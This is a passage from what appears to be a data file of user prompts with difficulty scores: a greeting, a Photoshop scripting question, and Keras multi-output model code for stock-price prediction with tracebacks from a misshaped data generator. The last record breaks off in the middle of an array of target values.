'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
return model
# %%
model = build_model()
history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
error:
{
"name": "AttributeError",
"message": "'numpy.ndarray' object has no attribute 'iloc'",
"stack": "---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
Cell In[35], line 3
1 model = build_model()
----> 3 history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
Cell In[34], line 21, in data_generator()
19 # Yield batches
20 for i in range(0, len(X_scaled), batch_size):
---> 21 X_batch = X_scaled.iloc[i:i+batch_size]
22 y_batch = Y_scaled[i:i+batch_size]
23 yield np.array(X_batch), np.array(y_batch)
AttributeError: 'numpy.ndarray' object has no attribute 'iloc'"
}
|
581b7153f4c34ccd3c8056082fdf8197
|
{
"intermediate": 0.41099169850349426,
"beginner": 0.38303688168525696,
"expert": 0.205971360206604
}
|
46,765
|
Hi
|
a4ad38fbe481fc2b7d8bd899219a3b2f
|
{
"intermediate": 0.33010533452033997,
"beginner": 0.26984941959381104,
"expert": 0.400045245885849
}
|
46,766
|
I need to open an URL with chrome using photoshop scripting. How can I do that?
|
d1061613ab0e8ffed7822ee2b41d8cd8
|
{
"intermediate": 0.43724194169044495,
"beginner": 0.26135408878326416,
"expert": 0.3014039695262909
}
|
46,767
|
code :
# %%
from sklearn.preprocessing import StandardScaler
import numpy as np
from sklearn.preprocessing import StandardScaler
# %%
import pandas as pd
chunk_size = 10000 # This depends on your available memory
batch_size = 72
# %%
def data_generator():
reader = pd.read_csv(r"C:\Users\arisa\Desktop\combined_day.csv", chunksize=chunk_size)
for chunk in reader:
X = chunk.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
Y = chunk[['y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d']].values
xScaler = StandardScaler()
yScaler = StandardScaler()
X_scaled = xScaler.fit_transform(X)
Y_scaled = yScaler.fit_transform(Y)
# Yield batches
for i in range(0, len(X_scaled), batch_size):
X_batch = X_scaled[i:i+batch_size]
y_batch = {
'high_output_1d': Y_scaled[i:i + batch_size, 0],
'low_output_1d': Y_scaled[i:i + batch_size, 1],
'priority_output_1d': Y_scaled[i:i + batch_size, 2],
'high_output_2d': Y_scaled[i:i + batch_size, 3],
'low_output_2d': Y_scaled[i:i + batch_size, 4],
'priority_output_2d': Y_scaled[i:i + batch_size, 5],
'high_output_3d': Y_scaled[i:i + batch_size, 6],
'low_output_3d': Y_scaled[i:i + batch_size, 7],
'priority_output_3d': Y_scaled[i:i + batch_size, 8],
'high_output_5d': Y_scaled[i:i + batch_size, 9],
'low_output_5d': Y_scaled[i:i + batch_size, 10],
'priority_output_5d': Y_scaled[i:i + batch_size, 11],
}
yield np.array(X_batch), np.array(y_batch)
# %%
from tensorflow.keras.layers import Dense, Dropout
from tensorflow.keras import Model
from tensorflow.keras.layers import Input, Dropout
def build_model():
input_shape = (6427,)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
return model
# %%
model = build_model()
history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
error:
{
"name": "ValueError",
"message": "When passing a dataset to a Keras model, the arrays must be at least rank 1. Received: {'high_output_1d': array([ 8.79217299e+00, 8.84339892e-01, 7.55902042e-01, 1.11906540e-01,
-2.26649447e-02, -4.11701868e-01, -5.68778841e-01, 5.85432460e-01,
-5.02327334e-01, 1.52637873e+00, 2.23464977e+00, 2.29235950e-01,
1.50940229e+00, -5.23579976e-01, -4.16326501e-01, 4.92877190e-02,
5.42060489e-02, 3.12979719e-01, 1.40941909e-01, -4.95542371e-03,
1.96429079e-01, -5.32675319e-01, 1.02765435e+00, -2.93751310e-01,
1.92111487e+00, 9.38977297e-01, -4.44392048e-01, 6.52754685e-02,
4.67296064e+00, -2.50815330e-02, 1.56193473e+00, -5.70026099e-01,
-2.85948033e-01, 3.00088762e-01, 1.20186367e+00, 1.22634695e+00,
-3.80834498e-01, 1.00077118e+00, 1.12641743e-01, -4.37100319e-02,
1.45405367e+00, 6.49528231e-01, -5.61224631e-01, -4.32377906e-01,
-8.13504326e-02, -3.33933058e-01, -3.46453842e-01, -2.39538075e-01,
6.51959971e-01, 2.52093706e+00, -2.39324606e-01, -4.79073157e-04,
-1.70394678e-01, -5.42552270e-01, -4.43487031e-01, 1.45189491e+00,
-3.76486529e-01, 1.70622454e-01, 1.33705161e+00, 2.82900771e-01,
-3.17095428e-01, -6.55754874e-02, 1.70774551e-01, -1.04341810e-01,
3.98202705e-01, -4.68149980e-01, -5.94507569e-01, -4.16240397e-01,
-1.55905947e-01, 2.03732870e-01, -4.72319210e-01, 1.31966277e+00]), 'low_output_1d': array([ 0.62222168, 0.50641497, -0.6090518 , -0.22490433, 0.38988916,
-0.07180503, -0.47035044, 0.82141432, -1.17004721, 0.63709271,
0.53498097, -0.02723523, 0.53917205, -1.0045638 , -3.09418541,
-0.23573305, -2.10687079, -0.55468606, 0.48654386, -0.7127193 ,
-1.20487145, -1.63227043, 0.66007135, -8.21289095, -1.79706476,
-4.60779591, -1.94973754, -5.44184606, 0.52137756, -1.70102634,
0.5151494 , -1.56606524, -2.86856769, -1.21492057, -0.25423014,
0.01421622, -0.44466742, 0.45018618, 0.619783 , -1.17005953,
0.6103516 , 0.61889233, -1.75820998, -2.11729097, -0.39898939,
-1.10658574, -1.24708922, -0.59100492, 0.1219168 , 0.32716717,
0.08521251, -0.11573405, -0.72660666, -1.14529386, -0.07100378,
-0.42453936, -3.48321905, -3.22402981, -0.13042889, -0.30978229,
-1.84511656, -0.22848678, 0.41075251, -0.49965728, 0.72595419,
-0.6290018 , -0.74311692, 0.01713297, 0.35140018, 0.28823087,
-0.48991381, 0.84596564]), 'priority_output_1d': array([-1.00722611, -1.00722611, -1.00722611, 0.99282573, -1.00722611,
0.99282573, 0.99282573, -1.00722611, 0.99282573, -1.00722611,
-1.00722611, -1.00722611, -1.00722611, 0.99282573, 0.99282573,
-1.00722611, 0.99282573, 0.99282573, -1.00722611, 0.99282573,
0.99282573, 0.99282573, -1.00722611, 0.99282573, -1.00722611,
0.99282573, 0.99282573, 0.99282573, -1.00722611, 0.99282573,
-1.00722611, 0.99282573, 0.99282573, 0.99282573, -1.00722611,
-1.00722611, 0.99282573, -1.00722611, -1.00722611, -1.00722611,
-1.00722611, -1.00722611, 0.99282573, 0.99282573, -1.00722611,
0.99282573, 0.99282573, -1.00722611, -1.00722611, -1.00722611,
0.99282573, 0.99282573, 0.99282573, 0.99282573, 0.99282573,
-1.00722611, 0.99282573, 0.99282573, -1.00722611, -1.00722611,
0.99282573, 0.99282573, -1.00722611, 0.99282573, -1.00722611,
0.99282573, 0.99282573, -1.00722611, -1.00722611, -1.00722611,
-1.00722611, -1.00722611]), 'high_output_2d': array([ 5.93195112e+00, 1.38234890e+00, 5.47186882e-01, -1.17218450e-01,
-2.10999641e-01, -4.82114627e-01, -3.49111146e-02, 2.12775865e-01,
-6.00258826e-02, 2.69754835e+00, 1.36209487e+00, 8.17323170e-01,
8.56678929e-01, -5.60081087e-01, -4.85337476e-01, 3.05186246e-01,
-1.57429203e-01, 2.29069439e-02, 2.47855747e-02, -1.98658097e-01,
-5.83157454e-02, -2.20404574e-01, 5.47992380e-01, -3.99916353e-01,
1.49107851e+00, 4.59156859e-01, -5.04896006e-01, 1.49296426e+00,
3.06132334e+00, 7.16719071e-01, 8.93288131e-01, -5.92448812e-01,
-3.94478346e-01, 3.10091035e-02, 1.77167650e+00, 6.59421187e-01,
2.47216135e-01, 5.54774159e-01, 5.19199504e-02, 5.43345110e-01,
9.98295765e-01, 2.57443410e-01, -5.86315178e-01, -4.96523500e-01,
-2.09686055e-01, -4.27918512e-01, -4.36644091e-01, 2.18096856e-01,
2.55430992e+00, 1.56160491e+00, -5.44706096e-02, -1.95538584e-01,
-3.13950652e-01, -5.73302643e-01, 3.94407937e-01, 8.16602752e-01,
-4.57573496e-01, -7.63000604e-02, 7.36569889e-01, 1.94529970e-03,
-4.16184577e-01, -3.65386694e-02, 2.37737179e-01, -8.60126399e-03,
8.22977813e-02, -5.21452613e-01, -6.09509643e-01, -2.16428747e-01,
2.45915781e-01, -5.32258238e-02, 5.66537814e-01, 8.31274632e-01]), 'low_output_2d': array([ 0.73460625, 0.64671157, -0.19990256, 0.09165671, 0.5582711 ,
-0.39642705, -0.09463135, 0.52442862, -0.67282313, 0.74589302,
0.66839252, 0.2416831 , 0.67157345, -2.66241052, -2.08606292,
-0.65998524, -1.98286003, -0.15864018, 0.08001662, -1.6989241 ,
-1.22777353, -0.97650242, -5.11315829, -5.971045 , -2.06402195,
-3.23485916, -5.0190101 , -3.86788442, 0.65806784, -1.02868661,
0.65334081, -2.39117122, -2.63411308, -0.84146959, 0.06939908,
0.27314382, -0.07513852, 0.60403519, -0.19094916, -0.62569477,
0.72559712, -0.36975717, -2.82820373, -1.34462207, -0.22531267,
-1.36886125, -1.31274648, -0.18620538, 0.35488613, 0.51066653,
0.3270284 , -0.78666465, -1.25822529, -0.71969117, -0.67043215,
-1.06784349, -4.47822764, -2.18461189, 0.16336144, -0.62637131,
-1.75632453, 0.08893772, 0.57410592, -0.11687458, 0.14413867,
-0.33238227, -0.58863737, 0.27535756, 0.52905884, 0.12669226,
-0.10947951, 0.90442287]), 'priority_output_2d': array([-1.03916644, -1.03916644, -1.03916644, 0.96230975, -1.03916644,
0.96230975, -1.03916644, 0.96230975, -1.03916644, -1.03916644,
-1.03916644, -1.03916644, -1.03916644, 0.96230975, 0.96230975,
0.96230975, 0.96230975, 0.96230975, 0.96230975, 0.96230975,
0.96230975, -1.03916644, 0.96230975, 0.96230975, 0.96230975,
0.96230975, 0.96230975, -1.03916644, -1.03916644, -1.03916644,
-1.03916644, 0.96230975, 0.96230975, -1.03916644, -1.03916644,
-1.03916644, -1.03916644, -1.03916644, -1.03916644, -1.03916644,
-1.03916644, 0.96230975, 0.96230975, 0.96230975, 0.96230975,
0.96230975, 0.96230975, -1.03916644, -1.03916644, -1.03916644,
-1.03916644, 0.96230975, 0.96230975, 0.96230975, -1.03916644,
0.96230975, 0.96230975, 0.96230975, -1.03916644, 0.96230975,
0.96230975, -1.03916644, -1.03916644, -1.03916644, 0.96230975,
0.96230975, 0.96230975, -1.03916644, -1.03916644, 0.96230975,
-1.03916644, -1.03916644]), 'high_output_3d': array([ 4.71621415, 1.19804116, 0.31770009, -0.22501563, -0.30162026,
-0.31233449, -0.15778335, 0.43421314, 1.16057897, 2.07421064,
1.29344201, 0.53835938, 0.57050691, -0.58676546, -0.52571156,
0.12002325, -0.25786155, -0.110555 , -0.10902045, -0.29153914,
-0.17690129, -0.28912251, 0.31835806, -0.4559358 , 1.08871261,
0.24579327, 0.09608714, 1.09025297, 2.37135817, 0.4561815 ,
0.60041093, -0.61320485, -0.4514938 , 0.75382567, 1.31791747,
0.82779958, 0.11432236, 0.4732649 , 0.56352854, 0.45719911,
0.68618582, 0.08102478, -0.60819462, -0.5348488 , -0.30054726,
-0.47880921, -0.48593665, 1.91444741, 1.95720714, 1.28850081,
-0.17376041, -0.28899098, -0.38571521, -0.29623437, 0.19290348,
0.53777091, -0.50303271, -0.19159167, 0.47239652, -0.1276774 ,
-0.46922441, 0.0985919 , 0.29047466, -0.1362923 , -0.06204193,
-0.55521201, -0.62714089, 0.14807491, 0.07160851, 0.46365286,
0.41919798, 0.54975556]), 'low_output_3d': array([ 7.93821628e-01, 7.18894557e-01, -2.81372512e-03, 2.45730132e-01,
1.87258780e-01, -1.70343833e-01, 8.69262170e-02, 5.70708808e-01,
-4.05961609e-01, 8.03443200e-01, 7.37376790e-01, 3.73622262e-01,
-9.10629954e-01, -2.10201374e+00, -1.74373748e+00, -9.78029617e-01,
-1.52272124e+00, 3.23609722e-02, -1.00934287e+00, -1.72951192e+00,
-8.79036989e-01, -4.76495181e+00, -4.19118861e+00, -5.20082219e+00,
-1.59190887e+00, -5.02233072e+00, -4.11093064e+00, -3.12963715e+00,
7.28575370e-01, -7.09322501e-01, -1.97269000e-01, -2.45740698e+00,
-2.20784836e+00, -5.49726690e-01, 2.26756294e-01, 4.00441400e-01,
1.03543158e-01, 6.82514466e-01, 4.81872944e-03, -3.65786369e-01,
7.86141671e-01, -1.73341638e+00, -2.24334653e+00, -1.00598601e+00,
-7.18323866e-01, -1.50515958e+00, -9.51473387e-01, 8.86262682e-03,
4.70123801e-01, 6.02921021e-01, -3.17845272e-01, -1.29657630e+00,
-9.96059673e-01, -1.14215218e+00, -1.22237889e+00, -2.75313245e+00,
-3.64993293e+00, -1.69470749e+00, 3.06855844e-01, -9.16321685e-01,
-1.32960783e+00, 2.43412283e-01, 6.57000836e-01, 6.79646580e-02,
1.87613539e-01, -3.59794214e-01, -3.34196260e-01, 4.02328539e-01,
6.18599808e-01, 2.75596678e-01, 7.42686937e-02, 8.03640765e-01]), 'priority_output_3d': array([-1.02860908, -1.02860908, -1.02860908, 0.97218664, 0.97218664,
-1.02860908, -1.02860908, -1.02860908, -1.02860908, -1.02860908,
-1.02860908, -1.02860908, 0.97218664, 0.97218664, 0.97218664,
0.97218664, 0.97218664, 0.97218664, 0.97218664, 0.97218664,
0.97218664, 0.97218664, 0.97218664, 0.97218664, 0.97218664,
0.97218664, -1.02860908, -1.02860908, -1.02860908, -1.02860908,
0.97218664, 0.97218664, 0.97218664, -1.02860908, -1.02860908,
-1.02860908, -1.02860908, -1.02860908, -1.02860908, -1.02860908,
-1.02860908, 0.97218664, 0.97218664, 0.97218664, 0.97218664,
0.97218664, 0.97218664, -1.02860908, -1.02860908, -1.02860908,
0.97218664, 0.97218664, 0.97218664, -1.02860908, 0.97218664,
0.97218664, 0.97218664, 0.97218664, -1.02860908, 0.97218664,
0.97218664, -1.02860908, -1.02860908, -1.02860908, 0.97218664,
0.97218664, 0.97218664, -1.02860908, -1.02860908, -1.02860908,
-1.02860908, 0.97218664]), 'high_output_5d': array([ 3.43085352, 0.74774032, 0.07635356, -0.30611401, -0.24030393,
-0.12262669, 1.08529305, 1.28186013, 0.96109604, 1.68590853,
0.82049719, 0.24463803, 0.26915515, -0.61343158, -0.5668692 ,
-0.07440348, -0.36259502, -0.25025257, -0.24908226, -0.38827902,
-0.30085117, -0.386436 , 0.07685536, -0.51365514, 0.66436156,
0.02151426, -0.0926582 , 0.66553631, 1.64256339, 0.18196556,
0.29196126, -0.63359542, -0.50970055, 0.74347945, 1.23870945,
0.62348067, 0.55365573, 0.85500748, 0.37646281, 0.18274164,
0.35737696, -0.10414542, -0.6297744 , -0.57383766, -0.39514902,
0.37495315, 0.71109134, 1.41311926, 1.4463189 , 0.81672882,
-0.29845579, -0.38633569, -0.46010183, -0.39185981, -0.01882181,
0.24418924, -0.54957331, -0.3120547 , 0.19433186, -0.26331086,
-0.52378961, 0.082117 , 0.05559025, -0.26988097, -0.21325437,
-0.40819043, -0.39626074, 0.45610495, 0.46116255, 0.25422073,
0.15376031, 0.25332925]), 'low_output_5d': array([ 0.86909012, 0.80749677, 0.21422077, 0.252387 , 0.37046874,
0.07650364, 0.28799096, 0.68568156, -0.11718455, 0.87699948,
0.27715391, -0.56802764, -0.64970248, -2.01012908, -1.63428184,
-0.58744965, -1.79860871, -1.02546824, -0.9926242 , -4.22306789,
-3.80560759, -3.93534411, -3.48586234, -5.42562259, -3.33341254,
-3.91204331, -3.1628323 , -2.35616582, 0.81545482, -0.67887223,
-0.63908216, -1.90576727, -1.59841483, -0.23536578, 0.40293744,
0.54571425, 0.30165081, 0.77759073, 0.22049498, -0.79445333,
-0.54246703, -1.22916553, -2.09930931, -1.5179469 , -0.80166265,
-1.0207737 , -0.56561926, 0.22381925, 0.60299625, 0.71216141,
-0.78197709, -1.44190642, -1.73645564, -2.81041725, -2.36248074,
-2.04666238, -2.78387187, -1.17659044, 0.171719 , -0.53672301,
-0.87646243, 0.41662939, 0.7566174 , 0.0657029 , 0.16446958,
-0.07923292, -0.05819027, 0.54726556, 0.72505007, 0.44308639,
0.27758591, 0.68488414]), 'priority_output_5d': array([-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, -1.02532046, -1.02532046, -1.02532046, 0.97530483,
0.97530483, 0.97530483, -1.02532046, -1.02532046, -1.02532046,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, -1.02532046, -1.02532046, 0.97530483, 0.97530483,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
-1.02532046, 0.97530483])} of rank 0.",
"stack": "---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
Cell In[53], line 3
1 model = build_model()
----> 3 history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\optree\\ops.py:594, in tree_map(func, tree, is_leaf, none_is_leaf, namespace, *rests)
592 leaves, treespec = _C.flatten(tree, is_leaf, none_is_leaf, namespace)
593 flat_args = [leaves] + [treespec.flatten_up_to(r) for r in rests]
--> 594 return treespec.unflatten(map(func, *flat_args))
ValueError: When passing a dataset to a Keras model, the arrays must be at least rank 1. Received: {'high_output_1d': array([ 8.79217299e+00, 8.84339892e-01, 7.55902042e-01, 1.11906540e-01,
-2.26649447e-02, -4.11701868e-01, -5.68778841e-01, 5.85432460e-01,
-5.02327334e-01, 1.52637873e+00, 2.23464977e+00, 2.29235950e-01,
1.50940229e+00, -5.23579976e-01, -4.16326501e-01, 4.92877190e-02,
5.42060489e-02, 3.12979719e-01, 1.40941909e-01, -4.95542371e-03,
1.96429079e-01, -5.32675319e-01, 1.02765435e+00, -2.93751310e-01,
1.92111487e+00, 9.38977297e-01, -4.44392048e-01, 6.52754685e-02,
4.67296064e+00, -2.50815330e-02, 1.56193473e+00, -5.70026099e-01,
-2.85948033e-01, 3.00088762e-01, 1.20186367e+00, 1.22634695e+00,
-3.80834498e-01, 1.00077118e+00, 1.12641743e-01, -4.37100319e-02,
1.45405367e+00, 6.49528231e-01, -5.61224631e-01, -4.32377906e-01,
-8.13504326e-02, -3.33933058e-01, -3.46453842e-01, -2.39538075e-01,
6.51959971e-01, 2.52093706e+00, -2.39324606e-01, -4.79073157e-04,
-1.70394678e-01, -5.42552270e-01, -4.43487031e-01, 1.45189491e+00,
-3.76486529e-01, 1.70622454e-01, 1.33705161e+00, 2.82900771e-01,
-3.17095428e-01, -6.55754874e-02, 1.70774551e-01, -1.04341810e-01,
3.98202705e-01, -4.68149980e-01, -5.94507569e-01, -4.16240397e-01,
-1.55905947e-01, 2.03732870e-01, -4.72319210e-01, 1.31966277e+00]), 'low_output_1d': array([ 0.62222168, 0.50641497, -0.6090518 , -0.22490433, 0.38988916,
-0.07180503, -0.47035044, 0.82141432, -1.17004721, 0.63709271,
0.53498097, -0.02723523, 0.53917205, -1.0045638 , -3.09418541,
-0.23573305, -2.10687079, -0.55468606, 0.48654386, -0.7127193 ,
-1.20487145, -1.63227043, 0.66007135, -8.21289095, -1.79706476,
-4.60779591, -1.94973754, -5.44184606, 0.52137756, -1.70102634,
0.5151494 , -1.56606524, -2.86856769, -1.21492057, -0.25423014,
0.01421622, -0.44466742, 0.45018618, 0.619783 , -1.17005953,
0.6103516 , 0.61889233, -1.75820998, -2.11729097, -0.39898939,
-1.10658574, -1.24708922, -0.59100492, 0.1219168 , 0.32716717,
0.08521251, -0.11573405, -0.72660666, -1.14529386, -0.07100378,
-0.42453936, -3.48321905, -3.22402981, -0.13042889, -0.30978229,
-1.84511656, -0.22848678, 0.41075251, -0.49965728, 0.72595419,
-0.6290018 , -0.74311692, 0.01713297, 0.35140018, 0.28823087,
-0.48991381, 0.84596564]), 'priority_output_1d': array([-1.00722611, -1.00722611, -1.00722611, 0.99282573, -1.00722611,
0.99282573, 0.99282573, -1.00722611, 0.99282573, -1.00722611,
-1.00722611, -1.00722611, -1.00722611, 0.99282573, 0.99282573,
-1.00722611, 0.99282573, 0.99282573, -1.00722611, 0.99282573,
0.99282573, 0.99282573, -1.00722611, 0.99282573, -1.00722611,
0.99282573, 0.99282573, 0.99282573, -1.00722611, 0.99282573,
-1.00722611, 0.99282573, 0.99282573, 0.99282573, -1.00722611,
-1.00722611, 0.99282573, -1.00722611, -1.00722611, -1.00722611,
-1.00722611, -1.00722611, 0.99282573, 0.99282573, -1.00722611,
0.99282573, 0.99282573, -1.00722611, -1.00722611, -1.00722611,
0.99282573, 0.99282573, 0.99282573, 0.99282573, 0.99282573,
-1.00722611, 0.99282573, 0.99282573, -1.00722611, -1.00722611,
0.99282573, 0.99282573, -1.00722611, 0.99282573, -1.00722611,
0.99282573, 0.99282573, -1.00722611, -1.00722611, -1.00722611,
-1.00722611, -1.00722611]), 'high_output_2d': array([ 5.93195112e+00, 1.38234890e+00, 5.47186882e-01, -1.17218450e-01,
-2.10999641e-01, -4.82114627e-01, -3.49111146e-02, 2.12775865e-01,
-6.00258826e-02, 2.69754835e+00, 1.36209487e+00, 8.17323170e-01,
8.56678929e-01, -5.60081087e-01, -4.85337476e-01, 3.05186246e-01,
-1.57429203e-01, 2.29069439e-02, 2.47855747e-02, -1.98658097e-01,
-5.83157454e-02, -2.20404574e-01, 5.47992380e-01, -3.99916353e-01,
1.49107851e+00, 4.59156859e-01, -5.04896006e-01, 1.49296426e+00,
3.06132334e+00, 7.16719071e-01, 8.93288131e-01, -5.92448812e-01,
-3.94478346e-01, 3.10091035e-02, 1.77167650e+00, 6.59421187e-01,
2.47216135e-01, 5.54774159e-01, 5.19199504e-02, 5.43345110e-01,
9.98295765e-01, 2.57443410e-01, -5.86315178e-01, -4.96523500e-01,
-2.09686055e-01, -4.27918512e-01, -4.36644091e-01, 2.18096856e-01,
2.55430992e+00, 1.56160491e+00, -5.44706096e-02, -1.95538584e-01,
-3.13950652e-01, -5.73302643e-01, 3.94407937e-01, 8.16602752e-01,
-4.57573496e-01, -7.63000604e-02, 7.36569889e-01, 1.94529970e-03,
-4.16184577e-01, -3.65386694e-02, 2.37737179e-01, -8.60126399e-03,
8.22977813e-02, -5.21452613e-01, -6.09509643e-01, -2.16428747e-01,
2.45915781e-01, -5.32258238e-02, 5.66537814e-01, 8.31274632e-01]), 'low_output_2d': array([ 0.73460625, 0.64671157, -0.19990256, 0.09165671, 0.5582711 ,
-0.39642705, -0.09463135, 0.52442862, -0.67282313, 0.74589302,
0.66839252, 0.2416831 , 0.67157345, -2.66241052, -2.08606292,
-0.65998524, -1.98286003, -0.15864018, 0.08001662, -1.6989241 ,
-1.22777353, -0.97650242, -5.11315829, -5.971045 , -2.06402195,
-3.23485916, -5.0190101 , -3.86788442, 0.65806784, -1.02868661,
0.65334081, -2.39117122, -2.63411308, -0.84146959, 0.06939908,
0.27314382, -0.07513852, 0.60403519, -0.19094916, -0.62569477,
0.72559712, -0.36975717, -2.82820373, -1.34462207, -0.22531267,
-1.36886125, -1.31274648, -0.18620538, 0.35488613, 0.51066653,
0.3270284 , -0.78666465, -1.25822529, -0.71969117, -0.67043215,
-1.06784349, -4.47822764, -2.18461189, 0.16336144, -0.62637131,
-1.75632453, 0.08893772, 0.57410592, -0.11687458, 0.14413867,
-0.33238227, -0.58863737, 0.27535756, 0.52905884, 0.12669226,
-0.10947951, 0.90442287]), 'priority_output_2d': array([-1.03916644, -1.03916644, -1.03916644, 0.96230975, -1.03916644,
0.96230975, -1.03916644, 0.96230975, -1.03916644, -1.03916644,
-1.03916644, -1.03916644, -1.03916644, 0.96230975, 0.96230975,
0.96230975, 0.96230975, 0.96230975, 0.96230975, 0.96230975,
0.96230975, -1.03916644, 0.96230975, 0.96230975, 0.96230975,
0.96230975, 0.96230975, -1.03916644, -1.03916644, -1.03916644,
-1.03916644, 0.96230975, 0.96230975, -1.03916644, -1.03916644,
-1.03916644, -1.03916644, -1.03916644, -1.03916644, -1.03916644,
-1.03916644, 0.96230975, 0.96230975, 0.96230975, 0.96230975,
0.96230975, 0.96230975, -1.03916644, -1.03916644, -1.03916644,
-1.03916644, 0.96230975, 0.96230975, 0.96230975, -1.03916644,
0.96230975, 0.96230975, 0.96230975, -1.03916644, 0.96230975,
0.96230975, -1.03916644, -1.03916644, -1.03916644, 0.96230975,
